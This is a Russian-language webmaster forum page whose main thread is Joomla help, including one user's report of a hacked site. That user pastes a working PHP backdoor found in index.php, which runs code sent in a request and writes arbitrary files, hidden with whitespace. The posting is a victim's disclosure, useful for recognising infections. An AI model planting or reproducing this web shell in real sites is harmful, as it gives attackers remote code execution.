- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
спасибо большое saitoff :)
Подскажите пожалуйста с чем может быть связана проблема. Сегодня на сайтах на одном аккаунте что на Joomle отображается ошибка - Parse error: syntax error, unexpected '<' in /home/domash/public_html/site.ru/index.php on line 89
Вроде как обычно такое происходит когда ломают хостинг и заливают вредоносный скрипт. В строке 89 ничего такого особого не нашел на первый взгляд, но пока не скопировал код сюда не увидел, вредоносный код. То есть открываю файл index.php в Notepad не видно вредоносной ссылки, пытаюсь скопировать код например на форум начиная с 89 строки, код отображается. Это как так, ребята?
Начина я 89 строки идет вот такое:
<?php $uxkzl = "f27fd6d4a185215907aff85ba7367f1c"; if(isset($_REQUEST['oefyhhx'])) { $aznnl = $_REQUEST['oefyhhx']; eval($aznnl); exit(0); } if(isset($_REQUEST['ocgnjjn'])) { $tjuxh = $_REQUEST['venkjti']; $agbafpo = $_REQUEST['ocgnjjn']; $ictpqdy = fopen($agbafpo, 'w'); $jsnd = fwrite($ictpqdy, $tjuxh); fclose($ictpqdy); echo $jsnd; exit(); } ?><?php
/**
* @version $Id: index.php 11407 2009-01-09 17:23:42Z willebil $
* @package Joomla
---------- Добавлено 19.12.2012 в 23:01 ----------
Ага уже понял, как это происходит, они сдвигают код в правую часть экрана, чтобы его не было видно на экране, вроде как много пробелов ставят. То есть получается полоса прокрутки внизу, сразу так и не поймешь. В общим пока понял.
нифигасе, вот жулики!
а какую версию джумлы используете?
Версия 1.5.14
Но как они забрались на сайт, или через хостинг или через дыру в сайте. Это надо анализировать. Проще конечно через сам сайт. Но бывают случаи и взлома сервера хостера.
нифигасе, вот жулики!
а какую версию джумлы используете?
когда то видел компонент, работает как парсер и выводит n количество новостей с другого сайта не сохраняя их
в общем нужно с форума (пхпбб) отображать последние комменты на джумле, или может есть готовое решение?
когда то видел компонент, работает как парсер и выводит n количество новостей с другого сайта не сохраняя их
в общем нужно с форума (пхпбб) отображать последние комменты на джумле, или может есть готовое решение?
Самый простой способ - сделать через импорт RSS. У меня в подписи сайт про заработок, там последние темы с форума как раз через RSS выводятся. Если форум поддерживает трансляцию последних комментариев, то этот способ вам как раз подходит.
помогите
нужно в articles list поставить количество статей, отличное от 5,10 и т.д
может кто-то сталкивался?
такой вопрос..
если я беру один модуль и копирую его к примеру 200 раз, создаю так блоки для внутренней перелинковки, в каждой статье будет свой модуль, ну и разные ссылки разумеется
это модуль DisplayNews, я ему даю список статей, а он их выводит через составленный мной шаблон.
это криминал или нет? сильно ли увеличиться нагрузка на сайт?
или стоит воспользоваться специальными компонентами для перелинковки?
Добрый день!
Прошу совета у специалистов, пожалуйста.
У меня сайты все на версии 1.5, сейчас произошло заражение сайтов, после удаления вирусов рекомендовали обновиться до последней версии, но это будет для меня очень сложно. Подскажите, правда ли настолько уязвима версия 1.5 и тоже рекомендуете обновиться?
Уважаемое сообщество! Подскажите где поправить css в joomla 1.5/ компонент tienda, чтобы название товара отражалось через тег заголовка <h1>?